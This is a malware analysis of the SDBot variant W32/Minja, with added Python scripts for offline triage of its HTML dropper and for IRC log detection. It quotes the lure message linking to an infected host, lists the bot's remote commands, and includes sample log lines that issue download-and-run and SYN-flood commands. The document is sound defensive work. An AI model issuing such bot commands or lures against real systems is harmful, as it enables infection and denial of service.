W32/Minja
Analysis
- Detection included in Fortinet Virus Update July 2 2003
  Firmware 2.30  AV definition 4.100
  Firmware 2.36  AV definition 4.100
  Firmware 2.50  AV definition 4.100
- The virus is a 32-bit Windows executable with a compressed size of 23,110 bytes. It may be delivered Base64-encoded inside an HTML document that is packaged in a .ZIP archive named "Mindjail.zip"; the archive comment reads:
Im lame, but im not a kiddie heh
=]
- The virus may have been posted as a link in IRC channels or sent as a message to IRC users in this format:
<xxxxxxxxx> EEEEEEETHHHOOOM! MINDJAIL!! HE IS TRAPPED!! GET HIM OUT! http://XX.XX.XX.XX:3030/mindjail.zip
In the above message, "xxxxxxxxx" stands for a nickname of nine random letters, and the hyperlink pointed to an already-infected computer serving the archive on TCP port 3030.
- If the .ZIP file is downloaded, it may contain an HTML file named "mindjail.html" with a file size of 32,907 bytes. The HTML file carries a Base64-encoded binary that is decoded and launched by script within the page; the binary may be launched without any user interaction beyond opening the page.
- If mindjail.html is opened, the binary may be written to the local machine as "javax.sun.base.exe" (elsewhere written "java.sun.base.exe"; both names are worth checking for). In the status bar at the bottom of the Internet Explorer window the message "Installing components…java.sun.base.exe" may be visible, and text referring to "Mindjail" is displayed in the browser window, as in this excerpt:
MINDJAIL
Eworethom is trapped - in mindjail.... Mindjail is a trap - its a thought that you just cant get out of your head..E-thoms Mindjail is that he cannot escape a mysterious invisible box which he calls "Satans Box".
- When the dropped file "java.sun.base.exe" is run, it may copy itself as "HPSCHED.EXE" into the Windows\System folder and add a registry entry so that the copy is loaded at Windows startup.
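The infection chain above (ZIP, HTML with a Base64 blob, script that decodes it to an .exe, copy to Windows\System as HPSCHED.EXE) can be triaged offline without opening the page in a browser. The following script is an added example written for this analysis, not code from Fortinet or from the sample: it pulls every long Base64 run out of an HTML file, decodes it, keeps only payloads that carry a valid MZ/PE header, and reports their size, SHA-256 and which of the names in this analysis appear in the page or in the decoded binary. The HTML and the "PE" it contains are constructed stand-ins (a bare header skeleton padded with the HPSCHED.EXE string), not the real mindjail.html or its 23,110-byte payload.

```python
import base64
import binascii
import hashlib
import re
import struct

# Names this analysis associates with the dropper; matched case-insensitively.
INDICATORS = ("java.sun.base.exe", "javax.sun.base.exe", "HPSCHED.EXE", "Mindjail")

# A Base64 run of at least 64 symbols, tolerating the line breaks and other
# whitespace that HTML/JS string literals commonly introduce.
B64_RUN = re.compile(r'(?:[A-Za-z0-9+/]\s*){64,}={0,2}')


def extract_base64_blobs(html: str) -> list:
    """Return every decodable Base64 run in the document as raw bytes."""
    blobs = []
    for m in B64_RUN.finditer(html):
        s = re.sub(r'\s+', '', m.group(0))
        s += '=' * (-len(s) % 4)            # repair stripped padding
        try:
            blobs.append(base64.b64decode(s, validate=True))
        except binascii.Error:
            continue                        # a long identifier or hex run, not Base64
    return blobs


def is_pe(data: bytes) -> bool:
    """True if data starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b'PE\0\0'


def triage(html: str) -> dict:
    """Summarise embedded PE payloads and indicator strings found in an HTML dropper."""
    report = {
        "html_indicators": [n for n in INDICATORS if n.lower() in html.lower()],
        "blobs": 0,
        "pe_payloads": [],
    }
    for raw in extract_base64_blobs(html):
        report["blobs"] += 1
        if is_pe(raw):
            report["pe_payloads"].append({
                "size": len(raw),
                "sha256": hashlib.sha256(raw).hexdigest(),
                "indicators": [n for n in INDICATORS
                               if n.lower().encode() in raw.lower()],
            })
    return report


# Constructed stand-in for the embedded binary: a minimal MZ/PE header skeleton
# padded with the HPSCHED.EXE string. It is not executable and not the real sample.
FAKE_PE = (b'MZ' + b'\0' * 58 + struct.pack('<I', 0x80) + b'\0' * 64
           + b'PE\0\0' + b'HPSCHED.EXE' + b'\0' * 53)
_b64 = '\n'.join(re.findall('.{1,76}', base64.b64encode(FAKE_PE).decode()))

# Constructed stand-in for mindjail.html (not the original page); the status-bar
# text and dropped file name are the ones reported in this analysis.
SAMPLE_HTML = f"""<html><body><h1>MINDJAIL</h1>
<script>
var blob = "{_b64}";
window.status = "Installing components...java.sun.base.exe";
</script></body></html>"""


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_HTML), indent=2))
```

Run it against a suspect HTML file by replacing SAMPLE_HTML with the file's contents; a page that yields a PE-shaped blob plus the status-bar text is enough to treat it as a dropper, and the SHA-256 gives you a hash to pivot on without ever executing the payload.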
- The dropped file is a variant of the remote access Trojan known as "SDBot".
- The Trojan connects to an IRC channel and awaits commands from its operator or operators. It accepts the following commands, each with a shortcut form:
Action - Shortcut
about - "ab"
action - "a"
addalias - "aa"
aliases - "al"
c_action - "c_a"
c_join - "c_j"
c_mode - "c_m"
c_nick - "c_n"
c_part - "c_p"
c_privmsg - "c_pm"
c_quit - "c_q"
c_raw - "c_r"
c_rndnick - "c_rn"
clone - "c"
cycle - "cy"
delay - "de"
die - "d"
disconnect - "dc"
dns - "dn"
download - "dl"
execute - "e"
id - "i"
join - "j"
killthread - "k"
log - "lg"
logout - "lo"
mode - "m"
netinfo - "ni"
nick - "n"
nldump - "nld"
open - "o"
part - "pt"
ping - "p"
prefix - "pr"
privmsg - "pm"
quit - "q"
raw - "rw"
reconnect - "r"
redirect - "rd"
remove - "rm"
repeat - "rp"
rndnick - "rn"
server - "se"
spam - "spm"
spy - "sp"
status - "s"
syn - "syn1"
sysinfo - "si"
threads - "t"
udp - "u"
update - "up"
visit - "v"
worm - "worm"
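Both the lure message and the SDBot command set above are visible on the IRC side, so an IRC server or channel log is a natural place to hunt for this infection. The script below is an added example written for this analysis, not code from Fortinet or from the SDBot family: it scans log lines of the form "[time] <nick> text", flags the lure (a link to mindjail.zip on a bare IP address, the MINDJAIL keyword, a nine-letter sender nick) and extracts the serving host and port as an indicator, and separately flags channel messages whose first word is one of the SDBot commands or shortcuts from the table. The page does not state the character that prefixes bot commands, so the "." prefix used here is an assumption, and the command heuristic is deliberately rated low unless the command is one of the obviously harmful ones (download, execute, update, syn, udp, spam, clone, worm). The log lines are constructed, with addresses from the 192.0.2.0/24 documentation range.

```python
import re
from dataclasses import dataclass, field

# Shortcut -> full command name, transcribed from the SDBot command table above.
SDBOT_SHORTCUTS = {
    "ab": "about", "a": "action", "aa": "addalias", "al": "aliases",
    "c_a": "c_action", "c_j": "c_join", "c_m": "c_mode", "c_n": "c_nick",
    "c_p": "c_part", "c_pm": "c_privmsg", "c_q": "c_quit", "c_r": "c_raw",
    "c_rn": "c_rndnick", "c": "clone", "cy": "cycle", "de": "delay",
    "d": "die", "dc": "disconnect", "dn": "dns", "dl": "download",
    "e": "execute", "i": "id", "j": "join", "k": "killthread", "lg": "log",
    "lo": "logout", "m": "mode", "ni": "netinfo", "n": "nick", "nld": "nldump",
    "o": "open", "pt": "part", "p": "ping", "pr": "prefix", "pm": "privmsg",
    "q": "quit", "rw": "raw", "r": "reconnect", "rd": "redirect", "rm": "remove",
    "rp": "repeat", "rn": "rndnick", "se": "server", "spm": "spam", "sp": "spy",
    "s": "status", "syn1": "syn", "si": "sysinfo", "t": "threads", "u": "udp",
    "up": "update", "v": "visit", "worm": "worm",
}
DANGEROUS = {"download", "execute", "update", "syn", "udp", "spam", "clone", "worm"}
COMMAND_PREFIX = "."   # assumption: the analysis does not give the bot's prefix

LINE_RE = re.compile(r'^(?:\[[^\]]*\]\s*)?<([^>]+)>\s*(.*)$')   # [time] <nick> text
LURE_URL_RE = re.compile(
    r'https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})/mindjail\.zip\b', re.I)
RANDOM_NICK_RE = re.compile(r'^[A-Za-z]{9}$')


@dataclass
class Hit:
    line_no: int
    nick: str
    kind: str          # "lure" or "command"
    severity: str      # "high" or "low"
    detail: str
    ioc: dict = field(default_factory=dict)


def parse_line(line: str):
    """Split one log line into (nick, text); None for joins, quits, notices etc."""
    m = LINE_RE.match(line.strip())
    return (m.group(1), m.group(2)) if m else None


def detect_lure(line_no: int, nick: str, text: str):
    """Flag the Mindjail lure and pull out the host/port that served the archive."""
    m = LURE_URL_RE.search(text)
    if not m:
        return None
    reasons = ["link to mindjail.zip on a bare IP address"]
    if "MINDJAIL" in text.upper():
        reasons.append("MINDJAIL keyword")
    if RANDOM_NICK_RE.match(nick):
        reasons.append("nine-letter sender nick")
    ioc = {"host": m.group(1), "port": int(m.group(2)), "path": "/mindjail.zip"}
    return Hit(line_no, nick, "lure", "high", "; ".join(reasons), ioc)


def detect_command(line_no: int, nick: str, text: str, prefix: str = COMMAND_PREFIX):
    """Flag a message whose first word is an SDBot command or shortcut (heuristic)."""
    if not text.startswith(prefix):
        return None
    rest = text[len(prefix):].strip()
    if not rest:
        return None
    token = rest.split()[0].lower()
    name = SDBOT_SHORTCUTS.get(token)
    if name is None and token in SDBOT_SHORTCUTS.values():
        name = token                     # full command name used instead of shortcut
    if name is None:
        return None
    severity = "high" if name in DANGEROUS else "low"
    return Hit(line_no, nick, "command", severity, f"SDBot command '{name}' (token '{token}')")


def scan(log_text: str) -> list:
    """Run both detectors over every parsable line and return the hits in order."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        parsed = parse_line(line)
        if not parsed:
            continue
        nick, text = parsed
        for hit in (detect_lure(n, nick, text), detect_command(n, nick, text)):
            if hit:
                hits.append(hit)
    return hits


# Constructed IRC log excerpt (not from the analysis); the lure line mirrors the
# format quoted above with a documentation-range address in place of XX.XX.XX.XX.
SAMPLE_LOG = """\
[21:14] <qzpwmrtyk> EEEEEEETHHHOOOM! MINDJAIL!! HE IS TRAPPED!! GET HIM OUT! http://192.0.2.10:3030/mindjail.zip
[21:15] <alice> lol what
[21:16] <bob> grab it here http://example.net/tools.zip
[21:20] <ctrl> .dl http://192.0.2.20:3030/up.exe c:\\winnt\\system\\x.exe 1
[21:21] <ctrl> .syn1 192.0.2.50 80 60
[21:22] <carol> .net is just a framework name
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h.line_no} [{h.severity}] {h.kind} from <{h.nick}>: {h.detail} {h.ioc}")
```

The lure detector is the reliable part: the fixed file name, the bare-IP URL and the nine-letter nick together are specific to this campaign, and the extracted host is the infected machine that should be isolated next. The command detector only ever corroborates; single-letter shortcuts such as "a" or "s" are ordinary English, so never alert on them without the prefix and, ideally, without an operator nick that has already been seen issuing one of the dangerous commands.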